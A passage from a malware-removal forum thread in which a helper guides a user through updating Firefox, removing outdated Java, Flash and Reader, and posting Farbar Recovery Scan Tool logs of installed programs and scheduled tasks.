2015-02-10 02:28 - 2014-06-23 23:12 - 00000000 ____D () C:\Users\VIJAY\AppData\Roaming\uTorrent
2015-02-10 02:28 - 2009-07-24 22:30 - 00000000 ____D () C:\Windows\Panther
2015-02-10 02:18 - 2014-12-26 11:23 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2015-02-10 02:18 - 2014-06-16 08:12 - 00000000 ____D () C:\Program Files\Google
2015-02-09 08:39 - 2009-07-24 21:41 - 00785302 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-02-08 20:31 - 2014-06-15 03:10 - 00000000 ____D () C:\Program Files\TATA Photon+
2015-02-08 20:31 - 2013-04-09 13:10 - 01112288 _____ (Microsoft Corporation) C:\Windows\system32\wdfcoinstaller01007.dll
2015-02-08 14:08 - 2014-06-15 17:21 - 00000000 ____D () C:\Users\VIJAY\AppData\Roaming\vlc
2015-02-07 19:13 - 2014-06-15 12:39 - 00002332 ____H () C:\Users\VIJAY\Documents\Default.rdp
2015-02-06 23:39 - 2014-06-15 03:01 - 00000000 ____D () C:\Users\VIJAY
2015-02-06 23:10 - 2014-06-28 09:15 - 00000052 _____ () C:\Windows\system32\DOErrors.log
2015-02-06 09:01 - 2014-06-19 00:20 - 00701616 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2015-02-06 09:01 - 2014-06-19 00:20 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2015-02-03 10:43 - 2014-06-15 12:35 - 00001660 _____ () C:\Windows\system32\Drivers\DisconnectedPolicy.xml
2015-02-01 16:02 - 2014-06-15 03:24 - 00000000 ____D () C:\Users\VIJAY\AppData\Roaming\Mozilla
2015-01-31 10:39 - 2014-06-21 14:04 - 00000000 ____D () C:\ProgramData\Vodafone
2015-01-31 10:28 - 2009-07-14 08:07 - 00000000 ____D () C:\Windows\system32\NDF
2015-01-26 22:50 - 2014-06-15 12:01 - 00000000 ____D () C:\Users\VIJAY\Downloads\movies
2015-01-24 03:06 - 2014-07-31 10:53 - 00000000 ____D () C:\Users\VIJAY\dwhelper
2015-01-23 23:58 - 2014-06-23 23:13 - 00000813 _____ () C:\Users\VIJAY\Desktop\µTorrent.lnk
2015-01-23 23:58 - 2014-06-23 23:13 - 00000793 _____ () C:\Users\VIJAY\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
2015-01-23 23:57 - 2014-06-15 03:11 - 00000000 ____D () C:\Users\VIJAY\AppData\Roaming\HpUpdate
2015-01-18 20:10 - 2015-01-10 23:17 - 00000016 _____ () C:\Users\VIJAY\Desktop\movie to be watched.txt
2015-01-14 02:29 - 2014-06-16 09:17 - 00000000 ____D () C:\Windows\system32\MRT
2015-01-14 02:23 - 2014-06-16 09:17 - 110348472 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

==================== Files in the root of some directories =======

2014-06-15 03:06 - 2014-06-15 03:06 - 0000000 _____ () C:\Users\VIJAY\AppData\Local\AtStart.txt
2014-07-13 20:35 - 2014-12-30 01:49 - 0007680 _____ () C:\Users\VIJAY\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-06-15 03:06 - 2014-06-15 03:06 - 0000000 _____ () C:\Users\VIJAY\AppData\Local\DSwitch.txt
2014-06-15 03:06 - 2014-06-15 03:06 - 0000000 _____ () C:\Users\VIJAY\AppData\Local\QSwitch.txt
2011-06-27 19:26 - 2011-06-27 19:26 - 0232496 ____R () C:\ProgramData\DeviceManager.xml.rc4
2014-06-15 15:04 - 2015-02-11 11:58 - 0000753 _____ () C:\ProgramData\hpqp.ini
2014-06-15 03:06 - 2014-12-30 00:41 - 0000178 _____ () C:\ProgramData\HPWALog.txt
2014-06-15 15:05 - 2014-06-15 15:05 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2009-08-25 05:59 - 2009-08-25 06:00 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2014-06-15 15:05 - 2014-06-15 15:05 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2009-08-25 05:54 - 2009-08-25 05:56 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2014-06-15 15:04 - 2014-06-15 15:04 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2014-06-15 15:05 - 2014-06-15 15:05 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2009-08-25 05:54 - 2009-08-25 05:54 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2009-08-25 05:56 - 2009-08-25 05:59 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2014-06-15 15:05 - 2014-06-15 15:05 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-02-03 00:45

==================== End Of Log ============================



#4 vijay.gupta

Posted 11 February 2015 - 12:48 AM

I have Symantec Endpoint Protection version 11.0.6300.803

Antivirus and Antispyware Definitions are from 5 Jan 2015. I ran LiveUpdate many times but it is not getting applied.

After scanning from FRST, addition.txt is also getting generated, do I need to post that as well?

Also, I have not cleaned anything after scanning from AdwCleaner... just generated the log and posted here... do I need to clean that also... there was only one thing that was found... it was a Firefox cookie... please let me know.

Please let me know if any other information is required.



#5 OCD

Posted 11 February 2015 - 01:07 AM

Hi vijay.gupta,

Update Firefox
  • In the upper left corner of your browser window click the Help menu.
  • Wait for the Help menu to expand, then click on About Firefox.
  • A small window will open similar to the one below.
[Image: Firefox-3_zpsc32408ba.png]
  • Click on the Update button as shown in the image above.
  • Allow Mozilla Firefox to update, reboot if instructed to do so.
=========================

Uninstall via Programs and Features

Click Start > Control Panel > Programs and Features. Locate and select the following that are present on the list and click the Remove button:
  • Java 7 Update 60
  • Java SE Development Kit 7 Update 60
  • Adobe Flash Player 10
  • Adobe Reader 9
=========================

Adobe Flash Player:

Go to http://get.adobe.com...player/?no_ab=1
  • Remove the check mark from the box "Install Google Drive"
  • Click the Download button, and follow the onscreen directions to complete the installation.
Please note, depending on your settings, you may have to temporarily disable your antivirus software for the Adobe Reader update.

=========================

Adobe Reader:

Go to http://get.adobe.com.../otherversions/
  • Use the drop-down menus to select your operating system
  • Select your language > Select The current version of Adobe Reader for your language
  • Remove the check mark from the box "Free! McAfee Security Scan Plus"
  • Click the Download button, and follow the onscreen directions to complete the installation.
Please note, depending on your settings, you may have to temporarily disable your antivirus software for the Adobe Reader update.

=========================

Clear Java Cache

Locate the Java Control Panel
  • Click on the Start button and then click on the Control Panel option.
  • In the Control Panel Search enter "Java Control Panel".
  • Click on the Java icon to open the Java Control Panel.
Delete Temporary Files through the Java Control Panel
  • In the Java Control Panel, under the General tab, click Settings under the Temporary Internet Files section.
    The Temporary Files Settings dialog box appears.
  • Click Delete Files on the Temporary Files Settings dialog.
    The Delete Temporary Files dialog box appears.
  • Click OK on the Delete Temporary Files dialog.
    Note: This deletes all the Downloaded Applications and Applets from the cache.
  • Click OK on the Temporary Files Settings dialog.
    Note: If you want to delete a specific application and applet from the cache, click on View Application and View Applet options respectively.
=========================

Reboot

=========================

Try and update your anti-virus again. Post back the results.

Also, post the Addition.txt log
OCD


#6 vijay.gupta

Posted 11 February 2015 - 02:23 PM

Performed all the actions except the Java Control Panel one, as I couldn't find any. Also, I tried to update the antivirus, but it is still not getting updated.

Addition Log contents:

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 08-02-2015
Ran by VIJAY at 2015-02-11 12:06:03
Running from C:\Users\VIJAY\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Symantec Endpoint Protection (Enabled - Out of date) {63DF5164-9100-186D-2187-8DC619EFD8BF}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Symantec Endpoint Protection (Enabled - Out of date) {D8BEB080-B73A-17E3-1B37-B6B462689202}
FW: Symantec Endpoint Protection (Enabled) {5BE4D041-DB6F-1935-0AD8-24F3E73C9FC4}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\uTorrent) (Version: 3.4.2.37754 - BitTorrent Inc.)
Acrobat.com (HKLM\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
ActiveCheck component for HP Active Support Library (Version: 3.0.0.2 - Hewlett-Packard) Hidden
Ad-Aware (HKLM\...\Ad-Aware) (Version:  - Lavasoft)
Ad-Aware (Version: 8.0.0 - Lavasoft) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 10.0.22.87 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader 9.1 MUI (HKLM\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Adobe Shockwave Player (HKLM\...\{AD72CFB4-C2BF-424E-9DF0-C7BAD1F30A11}) (Version: 11.0 - Adobe Systems, Inc.)
Alps Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version:  - ALPS ELECTRIC CO., LTD.)
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version: 5.60.48.35 - Broadcom Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 3.20 - Piriform)
Check Point VPN (HKLM\...\{db6ec6e6-fe11-4edf-ab81-ef8b6917d628}) (Version: 75.20.0000 - CheckPoint)
CyberLink DVD Suite (HKLM\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 6.0.3101 - CyberLink Corp.)
CyberLink YouCam (HKLM\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 2.0.3115 - CyberLink Corp.)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Google Chrome (HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\Google Chrome) (Version: 40.0.2214.111 - Google Inc.)
Google Talk Plugin (HKLM\...\{C77CC230-7417-3F01-B70D-52583DC9FEC9}) (Version: 5.40.2.0 - Google)
Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
HP Advisor (HKLM\...\{B53E61D7-7C80-40DF-82D2-CF5390D6D20A}) (Version: 3.2.8946.3086 - Hewlett-Packard)
HP Customer Experience Enhancements (HKLM\...\{5B295588-59C1-4386-9F85-BB4BEDCB0D22}) (Version: 5.7.0.3036 - Hewlett-Packard)
HP DVD Play 3.7 (HKLM\...\{45D707E9-F3C4-11D9-A373-0050BAE317E1}) (Version: 3.7.0.6623 - Hewlett-Packard)
HP Games (HKLM\...\WildTangent hp Master Uninstall) (Version: 1.0.0.71 - WildTangent)
HP Integrated Module with Bluetooth wireless technology (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.0.9602 - Broadcom Corporation)
HP Quick Launch Buttons (HKLM\...\{34D2AB40-150D-475D-AE32-BD23FB5EE355}) (Version: 6.50.4.1 - Hewlett-Packard)
HP Setup (HKLM\...\{F3B912F5-EB57-45AA-B3D1-EB532BCF6EF8}) (Version: 1.2.3220.3079 - Hewlett-Packard)
HP Support Assistant (HKLM\...\{4F46FDB9-B906-47BF-B3D5-C62E01B3C5EE}) (Version: 4.1.11.3 - Hewlett-Packard)
HP Update (HKLM\...\{D46D081B-F60E-467E-A7C4-117B70D76731}) (Version: 5.001.000.014 - Hewlett-Packard)
HP User Guides 0146 (HKLM\...\{45E5D641-3C82-4F95-92FB-AE5459DF2988}) (Version: 1.02.0002 - Hewlett-Packard)
HP Wireless Assistant (HKLM\...\{54CC7901-804D-4155-B353-21F0CC9112AB}) (Version: 3.50.9.1 - Hewlett-Packard)
HPAsset component for HP Active Support Library (Version: 3.0.2.2 - Hewlett-Packard) Hidden
IDT Audio (HKLM\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6225.0 - IDT)
Java 7 Update 60 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217060FF}) (Version: 7.0.600 - Oracle)
Java SE Development Kit 7 Update 60 (HKLM\...\{32A3A4F4-B792-11D6-A78A-00B0D0170600}) (Version: 1.7.0.600 - Oracle)
JMicron Flash Media Controller Driver (HKLM\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.32.1 - JMicron Technology Corp.)
join.me (HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\JoinMe) (Version: 1.18.0.189 - LogMeIn, Inc.)
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LabelPrint (HKLM\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1913 - CyberLink Corp.)
LabelPrint (Version: 2.5.1913 - CyberLink Corp.) Hidden
LightScribe System Software (HKLM\...\{82EF29B1-9B60-4142-A155-0599216DD053}) (Version: 1.18.6.1 - LightScribe)
LiveUpdate 3.3 (Symantec Corporation) (HKLM\...\LiveUpdate) (Version: 3.3.0.101 - Symantec Corporation)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Mozilla Firefox 31.0 (x86 en-US) (HKLM\...\Mozilla Firefox 31.0 (x86 en-US)) (Version: 31.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 31.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
muvee Reveal (HKLM\...\{293F900D-3743-A8CC-46AD-5AFBFF8E29CF}) (Version: 7.0.40.10061 - muvee Technologies Pte Ltd)
NVIDIA GeForce Experience 2.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
Outils de vérification linguistique 2013 de Microsoft Office - Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Power2Go (HKLM\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.3101 - CyberLink Corp.)
Power2Go (Version: 6.0.3101 - CyberLink Corp.) Hidden
PowerDirector (HKLM\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 7.0.3101 - CyberLink Corp.)
PowerDirector (Version: 7.0.3101 - CyberLink Corp.) Hidden
PowerRecover (Version: 5.5.1923 - CyberLink Corp.) Hidden
Q4Search version 1.0.1.5 (HKLM\...\{CB92E070-D5D3-4E84-8597-28BBBD66240D}_is1) (Version: 1.0.1.5 - Q For Search LTD)
QLBCASL (Version: 6.40.17.2 - Hewlett-Packard) Hidden
Realtek 8136 8168 8169 Ethernet Driver (HKLM\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0005 - Realtek)
Recuva (HKLM\...\Recuva) (Version: 1.51 - Piriform)
Reliance 3G (HKLM\...\{A9E5EDA7-2E6C-49E7-924B-A32B89C24A04}) (Version: 1.0.0.1 - ZTE Corporation)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.25.0 - SAMSUNG Electronics Co., Ltd.)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 32-Bit Edition (HKLM\...\{90150000-0011-0000-0000-0000000FF1CE}_Office15.PROPLUS_{7F6C4883-A18C-459A-82C1-A2F9403F2DA6}) (Version:  - Microsoft)
SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
Silent Install Builder (HKLM\...\{2452C59D-05CC-4A9A-A97F-B925390619E1}) (Version: 4.0.1 - APREL Technologies LLC)
SoftStylus (HKLM\...\{76D0B7D8-6683-4D54-A108-046A5E542F0B}) (Version: 2.2.103.0 - Motorola)
Sublime Text 2.0.2 (HKLM\...\Sublime Text 2_is1) (Version:  - )
Symantec Endpoint Protection (HKLM\...\{AAE221D5-C3DD-4FE2-A063-C1368FE730A5}) (Version: 11.0.6300.803 - Symantec Corporation)
Tata Photon+ (HKLM\...\Tata Photon+) (Version: 11.030.01.28.628 - Huawei Technologies Co.,Ltd)
TTSL Olive CE310 Dialer (HKLM\...\{90C99F3E-56DB-4965-B524-1D0E1851E03A}) (Version:  - )
Visual C++ 2008 x86 Runtime - v9.0.30729.01 (HKLM\...\{F333A33D-125C-32A2-8DCE-5C5D14231E27}.vc_x86runtime_30729_01) (Version: 9.0.30729.01 - Microsoft Corporation)
VLC media player (HKLM\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Vodafone Mobile Broadband Lite (HKLM\...\{6C29152D-3FF9-43B2-84E4-9B35FC0BF5C2}) (Version: 10.2.301.32820 - Vodafone)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{A1BF9950-8CDB-468E-83FA-EACFB00EA7D5}) (Version: 14.0.8064.206 - Microsoft Corporation)
WinRAR 4.00 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.00.0 - win.rar GmbH)
小米助手 (HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MiPhoneManager) (Version:  - 小米移动软件有限公司)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> C:\Users\VIJAY\AppData\Local\Google\Update\GoogleUpdate.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.25.5\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{39125640-8D80-11DC-A2FE-C5C455D89593}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Google Talk Plugin\googletalkax.dll (Google)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{5C65F4B0-3651-4514-B207-D10CB699B14B}\localserver32 -> C:\Users\VIJAY\AppData\Local\Google\Chrome\Application\40.0.2214.111\delegate_execute.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.24.15\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{AB9F4455-E591-4132-A386-0B91EAEDB96C}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Google Talk Plugin\o1dax.dll (Google)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.25.11\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1443430433-3504582150-3450442512-1000_Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\localserver32 -> C:\Users\VIJAY\AppData\Local\Temp\E07f88d\temp\S5830i_Modem_Files.zip.exe No File

==================== Restore Points  =========================

28-01-2015 10:44:22 Windows Update
31-01-2015 10:45:27 ##IDS_ERROR_1715##
31-01-2015 10:55:07 Windows Update
05-02-2015 00:57:27 Windows Update
10-02-2015 02:11:34 Restore Operation
10-02-2015 11:24:27 Checkpoint by HitmanPro
10-02-2015 11:25:28 Checkpoint by HitmanPro

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 07:34 - 2009-06-11 03:09 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {019D1DDD-29E1-40FC-982D-167A13B56834} - System32\Tasks\HPCeeScheduleForVIJAY => C:\Program Files\hewlett-packard\sdp\ceement\HPCEE.exe [2009-05-27] (Hewlett-Packard)
Task: {14B76D68-AAA5-4BF0-8524-498D0421B0BC} - System32\Tasks\Registration => C:\Program Files\Hewlett-Packard\HP TCS\RemEngine.exe [2009-07-09] ()
Task: {1608F6F0-771B-40F6-BE4B-9991BCAC4EA5} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1443430433-3504582150-3450442512-1000 => C:\Program Files\RealNetworks\RealDownloader\realupgrade.exe
Task: {2F951982-C7F0-4674-AE9E-007761776C27} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1443430433-3504582150-3450442512-1000 => C:\Program Files\RealNetworks\RealDownloader\realupgrade.exe
Task: {4AD09E1F-1059-4953-8C98-0454D25E2732} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1443430433-3504582150-3450442512-1000UA => C:\Users\VIJAY\AppData\Local\Google\Update\GoogleUpdate.exe [2014-08-09] (Google Inc.)
Task: {4C4090C3-B695-49BF-86C6-92BBBDF8F5A7} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2012-06-23] (Piriform Ltd)
Task: {578E3CCE-5896-49D9-B06F-71F93B631EED} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-1443430433-3504582150-3450442512-1000 => C:\Program Files\RealNetworks\RealDownloader\recordingmanager.exe
Task: {5A3B6744-DB49-43FA-8D0D-4388FD537950} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1443430433-3504582150-3450442512-1000Core => C:\Users\VIJAY\AppData\Local\Google\Update\GoogleUpdate.exe [2014-08-09] (Google Inc.)
Task: {6AA05B1F-A0BD-4CD2-A3D2-1A9C373A5346} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-1443430433-3504582150-3450442512-1000 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe
Task: {6B9310D7-1AE3-44A8-A432-9C067B03EA33} - System32\Tasks\{6144C679-CCF4-4AE5-9F85-5C8903B84ABA} => pcalua.exe -a C:\Users\VIJAY\Downloads\movies\Games\Cd\Setup.exe -d C:\Users\VIJAY\Downloads\movies\Games\Cd
Task: {7BD768F6-E7A3-43EF-8902-D867484ABA2A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HPSAObjUtilTask => C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\UtilTask.exe [2014-12-16] (Microsoft)
Task: {9485C386-9A32-4059-A42D-EFBF0AB544A1} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {9E56CBDE-5BA9-4635-9933-016DC8745B29} - System32\Tasks\Ad-Aware Update (Weekly) => C:\Program Files\Lavasoft\Ad-Aware\Ad-AwareAdmin.exe [2009-01-19] (Lavasoft)
Task: {BCDCD028-A3EB-4E2C-94B5-231FADF43587} - System32\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask => Sc.exe start osppsvc
Task: {C34E466E-4E24-42E8-8AE3-280D14678C65} - System32\Tasks\RecoveryCDWin7 => C:\Program Files\Hewlett-Packard\HP TCS\RemEngine.exe [2009-07-09] ()
Task: {CBA2E891-8163-482B-BBAC-5AB9920233C4} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Ghost Resign Task => c:\program files\hewlett-packard\hp health check\activecheck\product_line\HPResignFileLoader.exe [2014-12-16] (Microsoft)
Task: {CC81148E-06A6-47A5-8EA6-9A200CB64A4E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-06] (Adobe Systems Incorporated)
Task: {CF812C73-22FB-418C-8265-08EB0B4DF691} - System32\Tasks\Hewlett-Packard\HP Assistant\PC Tuneup => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2009-07-10] (Hewlett-Packard)
Task: {F3E45D06-4FBE-44A2-9926-F349E13FB121} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-1443430433-3504582150-3450442512-1000 => C:\Program Files\Real\RealUpgrade\RealUpgrade.exe
